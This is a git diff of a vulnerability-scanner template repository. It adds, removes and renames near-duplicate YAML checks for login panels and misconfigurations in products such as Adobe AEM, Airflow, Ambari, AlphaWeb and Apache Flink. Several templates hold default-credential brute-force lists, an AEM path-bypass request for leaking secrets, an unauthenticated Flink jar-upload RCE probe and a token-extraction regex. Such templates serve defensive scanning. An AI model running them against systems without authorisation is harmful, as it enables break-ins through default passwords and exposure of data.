reference: https://www.exploit-db.com/ghdb/6846 - tags: panel - + tags: panel,adobe requests: - method: GET path: - '{{BaseURL}}/CFIDE/componentutils/login.cfm' - + - '{{BaseURL}}/cfide/componentutils/login.cfm' matchers-condition: and matchers: - type: word diff --git a/poc/auth/adobe-connect-central-login-96.yaml b/poc/auth/adobe-connect-central-login-96.yaml index fdaf816057..1218c9f8d7 100644 --- a/poc/auth/adobe-connect-central-login-96.yaml +++ b/poc/auth/adobe-connect-central-login-96.yaml @@ -1,18 +1,10 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login Panel + name: Adobe Connect Central Login author: dhiyaneshDk - description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel,connect-central - reference: - - https://www.adobe.com/products/adobeconnect.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 + tags: adobe,panel requests: - method: GET @@ -29,5 +21,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-connect-central-login-97.yaml b/poc/auth/adobe-connect-central-login-97.yaml index 1218c9f8d7..fdaf816057 100644 --- a/poc/auth/adobe-connect-central-login-97.yaml +++ b/poc/auth/adobe-connect-central-login-97.yaml @@ -1,10 +1,18 @@ id: adobe-connect-central-login info: - name: Adobe Connect Central Login + name: Adobe Connect Central Login Panel author: dhiyaneshDk + description: An Adobe Connect Central login panel was detected. severity: info - tags: adobe,panel + tags: adobe,panel,connect-central + reference: + - https://www.adobe.com/products/adobeconnect.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/adobe-experience-manager-login-105.yaml b/poc/auth/adobe-experience-manager-login-105.yaml index 2162a6646f..4dbdef1e18 100644 --- a/poc/auth/adobe-experience-manager-login-105.yaml +++ b/poc/auth/adobe-experience-manager-login-105.yaml @@ -1,11 +1,19 @@ id: adobe-experience-manager-login info: - name: Adobe-Experience-Manager + name: Adobe Experience Manager Login Panel author: dhiyaneshDK + description: An Adobe Experience Manager login panel was detected. severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + reference: + - https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22 + - https://business.adobe.com/products/experience-manager/adobe-experience-manager.html tags: panel,aem,adobe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +29,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/auth/aem-default-login-140.yaml b/poc/auth/aem-default-login-140.yaml deleted file mode 100644 index 30c718c891..0000000000 --- a/poc/auth/aem-default-login-140.yaml +++ /dev/null @@ -1,65 +0,0 @@ -id: aem-default-login - -info: - name: Adobe AEM Default Login - author: random-robbie - severity: high - description: Adobe AEM default login credentials were discovered. - reference: - - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 8 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,default-login,adobe - -http: - - raw: - - | - POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Origin: {{BaseURL}} - Referer: {{BaseURL}}/libs/granite/core/content/login.html - - _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true - - attack: pitchfork - payloads: - aem_user: - - admin - - grios - - replication-receiver - - vgnadmin - - author - - anonymous - - jdoe@geometrixx.info - - aparker@geometrixx.info - aem_pass: - - admin - - password - - replication-receiver - - vgnadmin - - author - - anonymous - - jdoe - - aparker - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - login-token - - crx.default - condition: and - -# digest: 4a0a004730450220222a3b892a7451300a85043c153a1fbe5d336d8c9f30c474065214bbac5906bc022100981335810687d458df2fb4ca0c7698ec9597777f599956f12f0a62b18f285727:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aem-default-login.yaml b/poc/auth/aem-default-login.yaml new file mode 100644 index 0000000000..8072025a73 --- /dev/null +++ b/poc/auth/aem-default-login.yaml @@ -0,0 +1,56 @@ +id: aem-default-login + +info: + name: Adobe AEM Default Login + author: random-robbie + severity: high + description: Adobe AEM default login credentials were discovered. + reference: + - https://experienceleague.adobe.com/docs/experience-manager-64/administering/security/security-checklist.html?lang=en + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: aem,default-login,adobe + + +requests: + - raw: + - | + POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Origin: {{BaseURL}} + Referer: {{BaseURL}}/libs/granite/core/content/login.html + + _charset_=utf-8&j_username={{aem_user}}&j_password={{aem_pass}}&j_validate=true + + attack: pitchfork + payloads: + aem_user: + - admin + - grios + - replication-receiver + - vgnadmin + + aem_pass: + - admin + - password + - replication-receiver + - vgnadmin + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + condition: and + words: + - login-token + - crx.default + +# Enhanced by mp on 2022/03/23 diff --git a/poc/auth/aem-login-status-169.yaml b/poc/auth/aem-login-status-169.yaml deleted file mode 100644 index 6c6ccdcea5..0000000000 --- a/poc/auth/aem-login-status-169.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: aem-login-status - -info: - name: AEM Login Status - author: DhiyaneshDk - severity: info - description: LoginStatusServlet is exposed, it allows to bruteforce credentials. - reference: - - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212 - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java - metadata: - max-request: 3 - shodan-query: http.component:"Adobe Experience Manager" - tags: aem,adobe,misconfig - -http: - - method: GET - path: - - '{{BaseURL}}/system/sling/loginstatus' - - '{{BaseURL}}/system/sling/loginstatus.css' - - '{{BaseURL}}///system///sling///loginstatus' - - stop-at-first-match: true - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CREDENTIAL_CHALLENGE' - -# digest: 4a0a0047304502203d588dfb867f6570608796de1e9e4fd6377b9423f492dcc6166121425133a35a022100a854db9f3c2f05923fb27a7ec79de8428a1164b62a07806c77b94f0ec83abf47:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/aem-secrets.yaml b/poc/auth/aem-secrets.yaml new file mode 100644 index 0000000000..4ac0aaf165 --- /dev/null +++ b/poc/auth/aem-secrets.yaml @@ -0,0 +1,44 @@ +id: aem-secrets + +info: + name: AEM Secrets - Sensitive Information Disclosure + author: j3ssie & boobooHQ + severity: high + reference: + - https://www.linkedin.com/feed/update/urn:li:activity:7066003031271616513/ + description: | + Possible Juicy Files can be discovered at this endpoint. Search / Grep for secrets like hashed passwords ( SHA ) , internal email disclosure etc. + metadata: + max-request: 2 + verified: "true" + tags: aem,adobe,misconfig,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + - "{{BaseURL}}/..;//content/dam/formsanddocuments.form.validator.html/home/....children.tidy...infinity..json" + + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Accept-Language: en-US,en;q=0.9,hi;q=0.8 + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"jcr:uuid"' + - '"jcr:createdBy"' + - '"uri"' + condition: and + + - type: word + part: header + words: + - application/json + + - type: status + status: + - 200 diff --git a/poc/auth/aims-password-mgmt-client-218.yaml b/poc/auth/aims-password-mgmt-client-218.yaml new file mode 100644 index 0000000000..c6f768a5c9 --- /dev/null +++ b/poc/auth/aims-password-mgmt-client-218.yaml @@ -0,0 +1,27 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + description: An Aims Password management client was detected. + severity: info + tags: panel,aims + reference: + - https://www.avatier.com/products/identity-management/password-management/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" + +# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/aims-password-mgmt-client-219.yaml b/poc/auth/aims-password-mgmt-client-219.yaml new file mode 100644 index 0000000000..a178296f3f --- /dev/null +++ b/poc/auth/aims-password-mgmt-client-219.yaml @@ -0,0 +1,17 @@ +id: aims-password-mgmt-client + +info: + name: Aims Password Management Client Detect + author: iamthefrogy + severity: info + tags: panel,aims + +requests: + - method: GET + path: + - "{{BaseURL}}/aims/ps/" + + matchers: + - type: word + words: + - "Avatier Corporation" diff --git a/poc/auth/aims-password-mgmt-client-221.yaml b/poc/auth/aims-password-mgmt-client-221.yaml deleted file mode 100644 index 76998f88a1..0000000000 --- a/poc/auth/aims-password-mgmt-client-221.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: aims-password-mgmt-client - -info: - name: Aims Password Management Client Detect - author: iamthefrogy - severity: info - tags: panel - -requests: - - method: GET - path: - - "{{BaseURL}}/aims/ps/" - - matchers: - - type: word - words: - - "Avatier Corporation" diff --git a/poc/auth/aims-password-mgmt-client.yaml b/poc/auth/aims-password-mgmt-client.yaml index a178296f3f..76998f88a1 100644 --- a/poc/auth/aims-password-mgmt-client.yaml +++ b/poc/auth/aims-password-mgmt-client.yaml @@ -4,7 +4,7 @@ info: name: Aims Password Management Client Detect author: iamthefrogy severity: info - tags: panel,aims + tags: panel requests: - method: GET diff --git a/poc/auth/aims-password-portal-222.yaml b/poc/auth/aims-password-portal-222.yaml new file mode 100644 index 0000000000..62ffc3aebf --- /dev/null +++ b/poc/auth/aims-password-portal-222.yaml @@ -0,0 +1,32 @@ +id: aims-password-portal + +info: + name: AIMS Password Management Portal + author: dhiyaneshDK + severity: info + description: An AIMS Password Management portal was discovered. + reference: + - https://www.exploit-db.com/ghdb/6576 + - https://www.avatier.com/products/identity-management/password-management/ + tags: panel,aims + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/aims/ps/default.aspx' + + matchers-condition: and + matchers: + - type: word + words: + - 'Password Management Client' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/21 diff --git a/poc/auth/aims-password-portal-224.yaml b/poc/auth/aims-password-portal-224.yaml deleted file mode 100644 index eb21d8e0eb..0000000000 --- a/poc/auth/aims-password-portal-224.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aims-password-portal - -info: - name: AIMS Password Management Portal - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6576 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/aims/ps/default.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Password Management Client' - - type: status - status: - - 200 diff --git a/poc/auth/airflow-default-login-234.yaml b/poc/auth/airflow-default-login-234.yaml deleted file mode 100644 index 7addbc0c1a..0000000000 --- a/poc/auth/airflow-default-login-234.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: airflow-default-login - -info: - name: Apache Airflow Default Login - author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - metadata: - shodan-query: title:"Sign In - Airflow" - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: airflow,default-login,apache - -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - - type: word - words: - - 'You should be redirected automatically to target URL:
' - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/airflow-default-login.yaml b/poc/auth/airflow-default-login-236.yaml similarity index 100% rename from poc/auth/airflow-default-login.yaml rename to poc/auth/airflow-default-login-236.yaml diff --git a/poc/auth/alibaba-mongoshake-unauth-268.yaml b/poc/auth/alibaba-mongoshake-unauth-268.yaml new file mode 100644 index 0000000000..5d0b6ed712 --- /dev/null +++ b/poc/auth/alibaba-mongoshake-unauth-268.yaml @@ -0,0 +1,31 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + metadata: + max-request: 1 + tags: mongoshake,unauth,alibaba,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100df73190b4cb70a8ce254319365eb46566529f720568dd75e7c78ef98947776d602201c21217186da8ecab8fb38921f040a238ce5817e862ef108277fdfd8e53e7b52:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/alphaweb-default-login-275.yaml b/poc/auth/alphaweb-default-login-275.yaml new file mode 100644 index 0000000000..6532087439 --- /dev/null +++ b/poc/auth/alphaweb-default-login-275.yaml @@ -0,0 +1,35 @@ +id: alphaweb-default-login + +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + tags: default-login + reference: https://wiki.zenitel.com/wiki/AlphaWeb + +requests: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/alphaweb-default-login-277.yaml b/poc/auth/alphaweb-default-login-277.yaml deleted file mode 100644 index 6a48f18c6e..0000000000 --- a/poc/auth/alphaweb-default-login-277.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: alphaweb-default-login - -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - description: An AlphaWeb XE default login was discovered. - reference: - - https://wiki.zenitel.com/wiki/AlphaWeb - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N - cvss-score: 5.8 - cwe-id: CWE-522 - tags: default-login,AlphaWeb - -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: {{BaseURL}} - - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/alphaweb-default-login.yaml b/poc/auth/alphaweb-default-login.yaml index 6532087439..6a48f18c6e 100644 --- a/poc/auth/alphaweb-default-login.yaml +++ b/poc/auth/alphaweb-default-login.yaml @@ -4,8 +4,14 @@ info: name: AlphaWeb XE Default Login author: Lark Lab severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb requests: - raw: @@ -32,4 +38,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/amazon-mws-auth-token-283.yaml b/poc/auth/amazon-mws-auth-token-283.yaml index 28e8063f5e..457df905b0 100644 --- a/poc/auth/amazon-mws-auth-token-283.yaml +++ b/poc/auth/amazon-mws-auth-token-283.yaml @@ -1,15 +1,22 @@ id: amazon-mws-auth-token + info: name: Amazon MWS Auth Token author: puzzlepeaches severity: info - tags: exposure,token,aws -requests: + metadata: + max-request: 1 + tags: exposure,token,aws,amazon,auth + +http: - method: GET path: - "{{BaseURL}}" + extractors: - type: regex part: body regex: - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" + +# digest: 4a0a00473045022040ac741be24d02135b0308a6d074f2d03fe6a7f1417abf455cea9942aefc7a5c022100954436ed9253b63aeda894501173c9013bdb27a97305b3e03e74001b84c73fc7:922c64590222798bb761d5b6d8e72950 diff --git "a/poc/auth/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" "b/poc/auth/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" deleted file mode 100644 index a3309dd4f4..0000000000 --- "a/poc/auth/amazon-mws-auth-token_\351\207\215\345\244\215\345\211\257\346\234\254.yaml" +++ /dev/null @@ -1,18 +0,0 @@ -id: amazon-mws-auth-token - -info: - name: Amazon MWS Auth Token - author: puzzlepeaches - severity: info - tags: exposure,token,aws - -requests: - - method: GET - path: - - "{{BaseURL}}" - - extractors: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/poc/auth/ambari-default-login-289.yaml b/poc/auth/ambari-default-login-289.yaml index 7d9efa4734..b23093118b 100644 --- a/poc/auth/ambari-default-login-289.yaml +++ b/poc/auth/ambari-default-login-289.yaml @@ -3,8 +3,8 @@ id: ambari-default-login info: name: Apache Ambari Default Login author: pdteam - description: An Apache Ambari default admin login was discovered. severity: high + description: An Apache Ambari default admin login was discovered. reference: - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html classification: diff --git a/poc/auth/ambari-default-login.yaml b/poc/auth/ambari-default-login.yaml new file mode 100644 index 0000000000..7d9efa4734 --- /dev/null +++ b/poc/auth/ambari-default-login.yaml @@ -0,0 +1,35 @@ +id: ambari-default-login + +info: + name: Apache Ambari Default Login + author: pdteam + description: An Apache Ambari default admin login was discovered. + severity: high + reference: + - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: ambari,default-login,apache + +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and + +# Enhanced by mp on 2022/03/22 diff --git a/poc/auth/amcrest-login-296.yaml b/poc/auth/amcrest-login-296.yaml new file mode 100644 index 0000000000..7455bbce1f --- /dev/null +++ b/poc/auth/amcrest-login-296.yaml @@ -0,0 +1,37 @@ +id: amcrest-login + +info: + name: Amcrest Login + author: DhiyaneshDK + description: An Amcrest LDAP user login was discovered. + severity: info + reference: + - https://www.exploit-db.com/ghdb/7273 + metadata: + shodan-query: html:"amcrest" + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera,amcrest + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Amcrest Technologies" + - "LDAPUser" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/amcrest-login-297.yaml b/poc/auth/amcrest-login-297.yaml deleted file mode 100644 index 19837aca9a..0000000000 --- a/poc/auth/amcrest-login-297.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: amcrest-login - -info: - name: Amcrest Login - author: DhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7273 - metadata: - shodan-query: html:"amcrest" - google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera,amcrest - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Amcrest Technologies" - - "LDAPUser" - condition: and - - - type: status - status: - - 200 diff --git a/poc/auth/amcrest-login-299.yaml b/poc/auth/amcrest-login-299.yaml index 1c2714211b..19837aca9a 100644 --- a/poc/auth/amcrest-login-299.yaml +++ b/poc/auth/amcrest-login-299.yaml @@ -4,11 +4,7 @@ info: name: Amcrest Login author: DhiyaneshDK severity: info - description: An Amcrest LDAP user login was discovered. - reference: - - https://www.exploit-db.com/ghdb/7273 - classification: - cwe-id: CWE-200 + reference: https://www.exploit-db.com/ghdb/7273 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" @@ -30,5 +26,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/ametys-admin-login-300.yaml b/poc/auth/ametys-admin-login-300.yaml deleted file mode 100644 index 7a96ee1ada..0000000000 --- a/poc/auth/ametys-admin-login-300.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: ametys-admin-login - -info: - name: Ametys Admin Login Panel - author: pathtaga - severity: info - description: An Ametys admin login panel was discovered. - tags: panel,ametys,cms - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/_admin/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ametys - Log in' - - '' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/ametys-admin-login-302.yaml b/poc/auth/ametys-admin-login-302.yaml new file mode 100644 index 0000000000..7f33273288 --- /dev/null +++ b/poc/auth/ametys-admin-login-302.yaml @@ -0,0 +1,36 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + classification: + cwe-id: CWE-200 + tags: panel,ametys,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/poc/auth/ametys-admin-login.yaml b/poc/auth/ametys-admin-login.yaml index 7f33273288..7a96ee1ada 100644 --- a/poc/auth/ametys-admin-login.yaml +++ b/poc/auth/ametys-admin-login.yaml @@ -5,9 +5,12 @@ info: author: pathtaga severity: info description: An Ametys admin login panel was discovered. + tags: panel,ametys,cms classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: cwe-id: CWE-200 - tags: panel,ametys,cms requests: - method: GET diff --git a/poc/auth/apache-flink-unauth-rce-355.yaml b/poc/auth/apache-flink-unauth-rce-355.yaml index ddf35e73ce..cfb2281c08 100644 --- a/poc/auth/apache-flink-unauth-rce-355.yaml +++ b/poc/auth/apache-flink-unauth-rce-355.yaml @@ -1,34 +1,28 @@ id: apache-flink-unauth-rce - info: - name: Apache Flink - Remote Code Execution + name: Apache Flink Unauth RCE author: pikpikcu severity: critical - description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. + tags: apache,flink,rce + reference: | - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: apache,flink,rce,intrusive,unauth - requests: - raw: - | POST /jars/upload HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 187 Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 --8ce4b16b22b58894aa86c421e8759df3 Content-Disposition: form-data; name="jarfile";filename="poc.jar" Content-Type:application/octet-stream - {{randstr}} + nuclei --8ce4b16b22b58894aa86c421e8759df3-- - matchers-condition: and matchers: - type: word @@ -45,5 +39,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/23 diff --git a/poc/auth/apache-flink-unauth-rce-358.yaml b/poc/auth/apache-flink-unauth-rce-358.yaml new file mode 100644 index 0000000000..ddf35e73ce --- /dev/null +++ b/poc/auth/apache-flink-unauth-rce-358.yaml @@ -0,0 +1,49 @@ +id: apache-flink-unauth-rce + +info: + name: Apache Flink - Remote Code Execution + author: pikpikcu + severity: critical + description: Apache Flink + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. + - https://www.exploit-db.com/exploits/48978 + - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 + - https://github.com/LandGrey/flink-unauth-rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: apache,flink,rce,intrusive,unauth + +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data;boundary=8ce4b16b22b58894aa86c421e8759df3 + + --8ce4b16b22b58894aa86c421e8759df3 + Content-Disposition: form-data; name="jarfile";filename="poc.jar" + Content-Type:application/octet-stream + + {{randstr}} + --8ce4b16b22b58894aa86c421e8759df3-- + + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + condition: and + - type: word + words: + - "success" + - "_poc.jar" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/23 diff --git a/poc/auth/apache-flink-unauth-rce-359.yaml b/poc/auth/apache-flink-unauth-rce-359.yaml index 782eea435d..dbae4dd542 100644 --- a/poc/auth/apache-flink-unauth-rce-359.yaml +++ b/poc/auth/apache-flink-unauth-rce-359.yaml @@ -5,18 +5,16 @@ info: author: pikpikcu severity: critical description: Apache Flink - reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - - https://www.exploit-db.com/exploits/48978 - - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - - https://github.com/LandGrey/flink-unauth-rce + reference: Apache Flink contains an unauthenticated remote code execution vulnerability. - https://www.exploit-db.com/exploits/48978 - https://adamc95.medium.com/apache-flink-1-9-x-part-1-set-up-5d85fd2770f3 - https://github.com/LandGrey/flink-unauth-rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: + cvss-score: 10 cwe-id: CWE-77 + metadata: + max-request: 1 tags: apache,flink,rce,intrusive,unauth -requests: +http: - raw: - | POST /jars/upload HTTP/1.1 @@ -37,14 +35,16 @@ requests: - "application/json" part: header condition: and + - type: word words: - "success" - "_poc.jar" part: body condition: and + - type: status status: - 200 -# Enhanced by mp on 2022/05/23 +# digest: 4a0a00473045022100c23141a6f16f90c8fab66fa3b2c0a15f1a1e8764af83f977671389376049f79a02206e4a7c6f9fc1b8828421abed2d16188c020d5eb6277cfa5835a8d60a1314d352:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/apache-storm-unauth.yaml b/poc/auth/apache-storm-unauth.yaml index dc48849fe9..2a2c45e566 100644 --- a/poc/auth/apache-storm-unauth.yaml +++ b/poc/auth/apache-storm-unauth.yaml @@ -1,20 +1,14 @@ id: apache-storm-unauth - info: name: Apache Storm Unauth author: pikpikcu severity: medium - reference: - - https://storm.apache.org/releases/current/STORM-UI-REST-API.html - metadata: - max-request: 1 + reference: https://storm.apache.org/releases/current/STORM-UI-REST-API.html tags: apache,unauth,misconfig - -http: +requests: - method: GET path: - '{{BaseURL}}/api/v1/cluster/summary' - matchers-condition: and matchers: - type: word @@ -23,9 +17,6 @@ http: - '"totalMem":' - '"stormVersion":' condition: and - - type: status status: - 200 - -# 